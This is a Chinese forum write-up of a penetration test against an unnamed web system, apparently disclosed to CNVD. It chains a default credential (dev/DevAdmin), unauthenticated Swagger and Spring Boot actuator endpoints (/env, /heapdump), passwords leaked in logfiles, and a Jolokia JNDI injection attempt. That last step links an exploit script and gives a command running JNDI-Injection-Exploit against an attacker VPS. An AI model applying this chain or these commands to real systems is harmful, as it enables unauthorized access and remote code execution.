系统安全漏洞深度剖析:修复与挑战


No.0

引言

事实上,已经对漏洞进行了基本修复。

No.1

入口

config.js中获取大量接口,导致漏洞成为一个全面的问题。

图片[1]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

No.2

弱口令 – dev/DevAdmin

图片[2]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[3]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

No.3

未授权访问Swagger + 信息泄露

在Swagger中存在大量接口,可以通过这些接口进行功能测试。通过叠加pagepageSize参数,实现未经授权的敏感信息获取。

图片[4]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[5]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

No.4

Spring Boot未授权访问

推荐使用工具:JDumpSpider-1.0-SNAPSHOT-full.jarheapdump_tool.jar

  • /env
  • /heapdump
图片[6]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[7]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

对应第一个弱口令,获取其他敏感信息。

图片[8]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

No.5

Heapdump文件下载

图片[9]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[10]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[11]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

No.6

信息泄露

有些人会聪明地更改默认密码,但却忽略了logfile中记录的大量登录日志。通过分析日志,找到对方修改的密码。

图片[12]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[13]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

No.7

Jolokia JNDI注入

当携带createJNDIRealm参数时,可尝试利用RCE。推荐使用脚本:

https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py

bashCopy code

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A [VPS]

图片[14]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

python3 jolokia.py

图片[15]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛

对方反弹回显,但由于对方存在WAF或其他设备,未成功获取shell。

成果展示: 由于通用Web弱口令提交CNVD会转化为事件类型,因此没有提交,仅提交了Heapdump信息泄露漏洞。

图片[16]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[17]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
图片[18]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛
© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容